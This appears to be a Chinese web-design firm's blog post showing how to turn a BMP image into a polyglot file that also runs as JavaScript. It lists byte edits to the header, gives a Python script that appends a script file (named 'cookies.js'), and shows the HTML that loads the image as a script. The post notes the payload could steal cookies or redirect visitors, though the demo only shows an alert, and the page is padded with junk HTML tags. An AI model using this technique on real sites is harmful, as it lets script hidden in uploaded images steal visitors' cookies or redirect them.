• <bdo id='bmisug16'></bdo><ul id='duyuj9lq'></ul>

  • <tfoot id='pyp6yzpr'></tfoot>
    <legend id='dupwmigu'><style id='sazuhhnd'><dir id='09id0jme'><q id='7weunnkk'></q></dir></style></legend>

  • <i id='pan9314o'><tr id='ubsf47fs'><dt id='3mx4rpz8'><q id='zfkiw4i4'><span id='jfeznwmq'><b id='ks56yctt'><form id='rqnc60ut'><ins id='2c8tj67l'></ins><ul id='qkrtwj3w'></ul><sub id='i7vs4p7b'></sub></form><legend id='dv8v9v1x'></legend><bdo id='3qee51ou'><pre id='mklosrqg'><center id='r03jfywf'></center></pre></bdo></b><th id='i3ge8jmo'></th></span></q></dt></tr></i><div id='acqhvn27'><tfoot id='2uqg3f4j'></tfoot><dl id='d0n7gxx2'><fieldset id='2ovejdr2'></fieldset></dl></div>

      <small id='yqhxe25s'></small><noframes id='d7hy3cav'>

        精准传达 • 价值共享

        洞悉互联网前沿资讯,探寻网站营销规律

        图片文件黑客攻击原理

        作者: 庚午网络 | 2020-10-20 16:53 |点击:

        网站开发 网站建设 SEO 网站设计 网站首页 新网站 专业网站

      1. <legend id='wkst4hk8'><style id='ehcgkqon'><dir id='95ip94q5'><q id='jcggy7d8'></q></dir></style></legend>

        • <tfoot id='a2wehy9f'></tfoot>
            <bdo id='s24ovu5d'></bdo><ul id='xcarb5zp'></ul>

              <tbody id='f70cmz2r'></tbody>

              • <small id='2hurlwys'></small><noframes id='kc2b5jqq'>

                1. <i id='7r6esji9'><tr id='o1ttggbb'><dt id='52yphj5a'><q id='f8hjq9f1'><span id='rt8jhief'><b id='lkb3bkk2'><form id='wtreoj06'><ins id='3bip82ik'></ins><ul id='3wpulnpz'></ul><sub id='wxj7nbnu'></sub></form><legend id='0vd3wt5t'></legend><bdo id='bw4vf86j'><pre id='uj9wk32r'><center id='d5meyyy5'></center></pre></bdo></b><th id='9yce0mar'></th></span></q></dt></tr></i><div id='vnjv7942'><tfoot id='f2v7b7gj'></tfoot><dl id='shwcko8i'><fieldset id='2tmwehuz'></fieldset></dl></div>
                2. 这里以位图 BMP 为例演示图片文件黑客攻击的原理及实现。

                   

                  创建位图

                  创建或者随便找一个位图,使用编辑器(本文使用 UltraEdit 作为编辑查看工具)打开,可看到 16进制数。

                  BMP 格式中,前 2 字节是用于识别位图文件格式的字段,可以看到它对应 ASCII 码的 BM,只要该字段正确,图片文件就能被正确识别处理,而无论其余数据是否损坏。随后 4 字节用于指示文件大小,单位为字节。

                  灵梦.bmp

                  灵梦.bmp

                   

                   

                  插入脚本

                  在此基础上,我们就可以对图片动一些手脚了,我们可以在图片中插入一段 JS 脚本。

                  比如获取该网页cookie的脚本或者重定向到目标网站的脚本。这里我们仅作效果演示,所以用了弹框:

                  window.onload = alert("Image hacked!");
                   
                  JavaScript

                  然后我们将脚本插入到图片中,具体步骤如下:

                  1. 2A 2F(即 JS 多行注释中*/的十六进制码)替换为00 00,防止语法错误干扰脚本运行
                  2. 在图片的前两个字节后插入2F 2A( JS 多行注释中/*的十六进制码)
                  3. 在图片末尾插入FF 2A 2F 3D 31 3B(即*/=1;),其中=1;用于结束开头的BM。
                  4. 在图片最后插入你写好的脚本的十六进制码。

                   

                  2
                  2
                  2
                  4
                  4
                  4

                   

                  以上操作可以通过 Python 脚本简单实现:

                  # -*- coding:utf-8 -*-
                  
                  src_img_name = '灵梦.bmp'
                  rst_img_name = 'hackimg.bmp'
                  append_js_name = 'cookies.js'
                  
                  with open(src_img_name,'rb') as f:
                      buff = f.read()
                      buff = buff.replace(b'\x2A\x2F',b'\x00\x00')
                  
                  with open(rst_img_name,'wb') as f:
                      f.write(buff)
                      f.seek(2)
                      f.write(b'\x2F\x2A')
                      f.seek(0,2)
                      f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
                      f.write(open(append_js_name,'rb').read())
                   
                  Python

                  最后我们得到插入了恶意代码的位图文件:
                  hackimg.bmp

                  hackimg.bmp

                   

                   

                  浏览器运行

                  创建index.html文件,内容如下:

                  <!DOCTYPE html>
                  <html lang="zh">
                  <head>
                      <meta charset="UTF-8">
                      <meta name="viewport" content="width=device-width, initial-scale=1.0">
                      <meta http-equiv="X-UA-Compatible" content="ie=edge">
                      <title>图片黑客攻击</title>
                  </head>
                  <body>
                      <img src="hackimg.bmp" alt="博丽灵梦"><!-- 这里我们看到图片还能正常显示 -->
                      <script src="hackimg.bmp"></script><!-- 脚本也成功执行了 -->
                  </body>
                  </html>
                   

                  运行效果如下:
                  15778547433291.png

                  15778547433291.png

                   

                  其他图片格式也可以通过类似的操作实现。

                   
                  二度创作,如有侵权请联系删除。如没特殊注明,文章均为庚午网络原创,转载请注明https://www.hngengwu.com/wangzhanjianshezhishi/109.html
                    <bdo id='p17fqubm'></bdo><ul id='olbw8aiq'></ul>

                  <small id='bsfcsaqi'></small><noframes id='y22fk0z9'>

                  1. <i id='dj0i8o48'><tr id='mr9r4843'><dt id='6a8ne4zt'><q id='2vlajq8s'><span id='gkphms4p'><b id='2j2m1aty'><form id='65fcayg2'><ins id='kc79srgj'></ins><ul id='gowcfuic'></ul><sub id='c8har1ck'></sub></form><legend id='8ss0s2di'></legend><bdo id='4b8xxl8k'><pre id='nyltwqcs'><center id='84gjyg3a'></center></pre></bdo></b><th id='lt2vso3k'></th></span></q></dt></tr></i><div id='rit3scds'><tfoot id='7wtevhf6'></tfoot><dl id='obsvhvb8'><fieldset id='3x1w758x'></fieldset></dl></div>
                    <legend id='6z2jd7eb'><style id='0grs59yi'><dir id='q3qyqtr3'><q id='643famvz'></q></dir></style></legend>

                    1. <tfoot id='4rtrlbdx'></tfoot>
                      多一份策划方案,总有益处。

                      请直接添加技术总监微信联系咨询

                      网站设计 品牌营销

                      多一份参考,总有益处

                      联系庚午网络,获得专属《策划方案》及报价

                      咨询相关问题或预约面谈,可以通过以下方式与我们联系

                      业务热线:18574395938 / 大客户专线:18574395938